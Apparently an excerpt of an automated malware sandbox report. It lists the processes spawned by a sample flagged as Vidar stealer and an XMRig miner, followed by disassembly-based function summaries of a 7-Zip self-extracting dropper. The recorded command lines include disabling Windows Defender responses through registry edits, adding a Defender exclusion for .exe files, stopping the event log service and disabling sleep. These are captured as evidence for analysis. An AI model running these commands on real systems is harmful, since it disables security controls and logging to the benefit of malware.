Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	10:12:45
Start date:	10/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	10:12:45
Start date:	10/08/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x8e0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	10:12:45
Start date:	10/08/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0xec0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000024.00000002.2468755517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_EXEPWSH_DLAgent, Description: Detects SystemBC, Source: 00000024.00000002.2468755517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000024.00000002.2568546778.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	10:12:46
Start date:	10/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	10:12:46
Start date:	10/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	10:12:47
Start date:	10/08/2024
Path:	C:\Windows\SysWOW64\forfiles.exe
Wow64 process (32bit):	true
Commandline:	forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Imagebase:	0x70000
File size:	41'472 bytes
MD5 hash:	D95C443851F70F77427B3183B1619DD3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	10:12:47
Start date:	10/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	10:12:47
Start date:	10/08/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Imagebase:	0x500000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	10:12:47
Start date:	10/08/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop eventlog
Imagebase:	0x7ff740650000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	10:12:47
Start date:	10/08/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe start "VIFLJRPW"
Imagebase:	0x7ff740650000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	10:12:47
Start date:	10/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	10:12:47
Start date:	10/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	10:12:47
Start date:	10/08/2024
Path:	C:\ProgramData\xprfjygruytr\etzpikspwykg.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\xprfjygruytr\etzpikspwykg.exe
Imagebase:	0x140000000
File size:	10'590'720 bytes
MD5 hash:	488D85695B6E76307AA595F8DB6A48FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002E.00000003.2200376468.00000000009F0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000002E.00000003.2200376468.00000000009F0000.00000004.00000001.00020000.00000000.sdmp, Author: unknown Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000002E.00000003.2200376468.00000000009F0000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 0000002E.00000003.2200376468.00000000009F0000.00000004.00000001.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 67%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	10:12:50
Start date:	10/08/2024
Path:	C:\Windows\SysWOW64\forfiles.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
Imagebase:	0x70000
File size:	41'472 bytes
MD5 hash:	D95C443851F70F77427B3183B1619DD3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	10:12:50
Start date:	10/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	10:12:50
Start date:	10/08/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Imagebase:	0x7ff74bae0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	10:12:50
Start date:	10/08/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Imagebase:	0x7ff74bae0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	10:12:50
Start date:	10/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	10:12:50
Start date:	10/08/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Imagebase:	0x7ff74bae0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	10:12:50
Start date:	10/08/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Imagebase:	0x7ff74bae0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	10:12:50
Start date:	10/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	55
Start time:	10:12:50
Start date:	10/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	10:12:50
Start date:	10/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ec4b0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	10:12:50
Start date:	10/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	14.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	45

Executed Functions

Function 00414B04 Relevance: 6.1, APIs: 4, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32 ref: 00414B2A

Part of subcall function 004159F8: HeapCreate.KERNELBASE(00000000,00001000,00000000,00414B62,00000001), ref: 00415A09
Part of subcall function 004159F8: HeapDestroy.KERNEL32 ref: 00415A48

GetCommandLineA.KERNEL32 ref: 00414B8A
GetStartupInfoA.KERNEL32(?), ref: 00414BB5
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00414BD8

Part of subcall function 00414C31: ExitProcess.KERNEL32 ref: 00414C4E

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
String ID:
API String ID: 2057626494-0
Opcode ID: e3a55e15dfbba78f576db0669a4780403b126b59620817d16bca0fbeb85d5517
Instruction ID: b13fe99396feb2249fb7197ea22bdd2eb3a8d4431b5d50e9622b99800ed9eeb5
Opcode Fuzzy Hash: e3a55e15dfbba78f576db0669a4780403b126b59620817d16bca0fbeb85d5517
Instruction Fuzzy Hash: 0721D2B0A44705AFD718AFB6DC46BEE7BB8EF44714F10052FF9009A291DB3C85808A9C

Function 004055DE Relevance: 6.1, APIs: 4, Instructions: 59
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 004055E3

Part of subcall function 0040551A: FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525

FindFirstFileW.KERNELBASE(?,?), ref: 00405611
AreFileApisANSI.KERNEL32(?), ref: 0040563D
FindFirstFileA.KERNEL32(?,?,00000001), ref: 0040565E

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: FileFind$First$ApisCloseH_prolog
String ID:
API String ID: 4121580741-0
Opcode ID: fcb5256250039c908afd196fb8e76c17c38080862ebf91937f58451f3d562862
Instruction ID: 53571c6d670a3437f98eaf3b47711b77fa147e423a783867877babb07b55427d
Opcode Fuzzy Hash: fcb5256250039c908afd196fb8e76c17c38080862ebf91937f58451f3d562862
Instruction Fuzzy Hash: AB21813180050ADFCF11EF60C8459EEBB75EF00329F10476AE4A5B61E1DB399A85CF48

Function 0040553A Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040551A: FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525

FindFirstFileA.KERNELBASE(?,?,000000FF), ref: 00405559

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 4d5417fc6ca074e65557f02866c61fee52306747aaa4eef42dce5467d8724910
Instruction ID: 4d0f5172a85985fc9641596f45f8b0e99eb03685ed3a07152804d04183bf4296
Opcode Fuzzy Hash: 4d5417fc6ca074e65557f02866c61fee52306747aaa4eef42dce5467d8724910
Instruction Fuzzy Hash: 5DE0923040050876CB20BF35DC019EB776AEF11398F104276F955672E5D738D9468F98

Function 00401014 Relevance: 56.7, APIs: 12, Strings: 20, Instructions: 692
windowsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00401A51: GetVersionExA.KERNEL32(?), ref: 00401A6B

GetCommandLineW.KERNEL32(00000003,00000003,00000003,00000003,?,00000000), ref: 0040108B

Part of subcall function 004038EE: __EH_prolog.LIBCMT ref: 004038F3

Part of subcall function 004045E2: __EH_prolog.LIBCMT ref: 004045E7
Part of subcall function 004045E2: GetModuleFileNameW.KERNEL32(?,?,00000105,00000003,00000000,00000000), ref: 00404618

Part of subcall function 0040235E: __EH_prolog.LIBCMT ref: 00402363

Part of subcall function 00402323: __EH_prolog.LIBCMT ref: 00402328

Part of subcall function 00403D5A: __EH_prolog.LIBCMT ref: 00403D5F

MessageBoxW.USER32(00000000,?,?,00000010), ref: 004015DF
SetCurrentDirectoryA.KERNELBASE(?,?,00000001,?,?,00000003,00000003,0042023C,;!@InstallEnd@!,?,00000003,00000000,00000002,00420274,00000003,?), ref: 0040161E
SetCurrentDirectoryA.KERNEL32(?,?,00000000), ref: 00401627
ShellExecuteExA.SHELL32(0000003C,?,00000000), ref: 004016D7
MessageBoxW.USER32(00000000,?,?,00000024), ref: 00401306

Part of subcall function 00411093: MessageBoxW.USER32(00000000,?,7-Zip,00000010), ref: 0041109C

Part of subcall function 00402F15: __EH_prolog.LIBCMT ref: 00402F1A

SetCurrentDirectoryA.KERNEL32(?,?,00000000), ref: 004018B2
CloseHandle.KERNEL32(?,?,00000000), ref: 00401940
WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00401965
CloseHandle.KERNEL32(?,?,00000000), ref: 0040196E
SetCurrentDirectoryA.KERNEL32(?,?,00000000), ref: 00401977

Strings

Can not open file, xrefs: 004016EB
> @, xrefs: 004011DC
;!@Install@!UTF-8!, xrefs: 00401178
;!@InstallEnd@!, xrefs: 00401173
, xrefs: 004016DD
Config failed, xrefs: 004011FE
Can not load codecs, xrefs: 0040152A
%%T, xrefs: 004017CD
Can not create temp folder archive, xrefs: 004014DC
<, xrefs: 0040166B
Can not find setup.exe, xrefs: 00401776
Directory, xrefs: 004012A9
D, xrefs: 00401821
ExecuteFile, xrefs: 004013DD
Title, xrefs: 00401212
%%T\, xrefs: 0040179E
setup.exe, xrefs: 00401731
Can't load config info, xrefs: 0040118B
RunProgram, xrefs: 0040139D
ExecuteParameters, xrefs: 0040141D

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: H_prolog$CurrentDirectory$Message$CloseHandle$CommandExecuteFileLineModuleNameObjectShellSingleVersionWait
String ID: $%%T$%%T\$;!@Install@!UTF-8!$;!@InstallEnd@!$<$> @$Can not create temp folder archive$Can not find setup.exe$Can not load codecs$Can not open file$Can't load config info$Config failed$D$Directory$ExecuteFile$ExecuteParameters$RunProgram$Title$setup.exe
API String ID: 2760820266-829806607
Opcode ID: 2ae731fc3f4a3823738156fd9143628e005fdebe6c7a76c6afd666806b1dc003
Instruction ID: 30a6e78c0a87ce65c61bf6c489231b06ab30573cf11c386798d37ebdc1e5dfdc
Opcode Fuzzy Hash: 2ae731fc3f4a3823738156fd9143628e005fdebe6c7a76c6afd666806b1dc003
Instruction Fuzzy Hash: 57524971D002199ADF21EFA1DC85AEEBB75BF04318F1040BFE149761A2DB395A85CF58

Function 0040AD19 Relevance: 14.2, APIs: 9, Instructions: 682
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0040AD1E

Part of subcall function 0040D7CC: __EH_prolog.LIBCMT ref: 0040D7D1

Part of subcall function 00413310: InitializeCriticalSection.KERNEL32(?,?,?,00000000,00000000), ref: 0041333E

DeleteCriticalSection.KERNEL32(?), ref: 0040AF52
DeleteCriticalSection.KERNEL32(?), ref: 0040B1DF
DeleteCriticalSection.KERNEL32(?), ref: 0040B24A
DeleteCriticalSection.KERNEL32(?), ref: 0040B2A7
DeleteCriticalSection.KERNEL32(?), ref: 0040B3B6
DeleteCriticalSection.KERNEL32(?), ref: 0040B410
DeleteCriticalSection.KERNEL32(?,?,?,00000004,00000004), ref: 0040B485
DeleteCriticalSection.KERNEL32(?), ref: 0040B517

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: CriticalSection$Delete$H_prolog$Initialize
String ID:
API String ID: 3452124646-0
Opcode ID: 5f6b8a8cdbdc89edeaeca9fb6a48680f4fe42b6689f54ac84f6a401f85157967
Instruction ID: 06aa0bffc57edc8446930be4fb3d3ecc4288fdccd94c57135405988f21593cb0
Opcode Fuzzy Hash: 5f6b8a8cdbdc89edeaeca9fb6a48680f4fe42b6689f54ac84f6a401f85157967
Instruction Fuzzy Hash: 5D625E7090024ADFDB14DFA4C944BDDBBB4EF14308F1480AEE815B72D2DB789A49DB99

Function 004059B3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 004059B8
AreFileApisANSI.KERNEL32(?,?,00000000,00000003,?,00000000,?,00000000), ref: 004059DC

Part of subcall function 0040597A: CreateFileA.KERNEL32(?,00000001,?,00000000,?,?,00000000,?,KA,00405A0D,?,?,?,KA,?,00000001), ref: 0040599C

CreateFileW.KERNELBASE(?,?,?,00000000,KA,?,00000000,?,00000000,00000003,?,00000000,?,00000000), ref: 00405A41

Strings

KA, xrefs: 00405A34, 004059FE

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: File$Create$ApisH_prolog
String ID: KA
API String ID: 1948390111-4133974868
Opcode ID: f88b55b959810e929b2353b4b1d1eb61229a220c48e216d77a80ee84dd8b33a8
Instruction ID: 6ceee1153368ae3910bf8b124445a1a72b78f4c7609cf7ab69cd6f34e54ac91e
Opcode Fuzzy Hash: f88b55b959810e929b2353b4b1d1eb61229a220c48e216d77a80ee84dd8b33a8
Instruction Fuzzy Hash: E0118E72A00109EFCF01AFA4D8818DE7F76EF08318F10412AF512B21A1CB398A65DF94

Function 0040483F Relevance: 6.0, APIs: 4, Instructions: 36
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetLastError.KERNEL32(00000078,0041B370,00000000,00402AAF,00000000,?,?,?,?), ref: 0040484F
CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000003,02000000,00000000,?,0041B370,00000000,00402AAF,00000000,?,?,?,?), ref: 0040486B
SetFileTime.KERNELBASE(00000000,00000000,?,?,?,40000000,00000003,00000000,00000003,02000000,00000000,?,0041B370,00000000,00402AAF,00000000), ref: 00404882
CloseHandle.KERNEL32(00000000,?,40000000,00000003,00000000,00000003,02000000,00000000,?,0041B370,00000000,00402AAF,00000000,?,?,?), ref: 0040488E

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: File$CloseCreateErrorHandleLastTime
String ID:
API String ID: 2291555494-0
Opcode ID: ff746e65f9cee30ffc8bafec341a8eb05b102094c88bf525f6141f2248b114e2
Instruction ID: 64467d0e5ceda328e6e32eae128236dd02d513a4ef1926b956b8d25c0d97de23
Opcode Fuzzy Hash: ff746e65f9cee30ffc8bafec341a8eb05b102094c88bf525f6141f2248b114e2
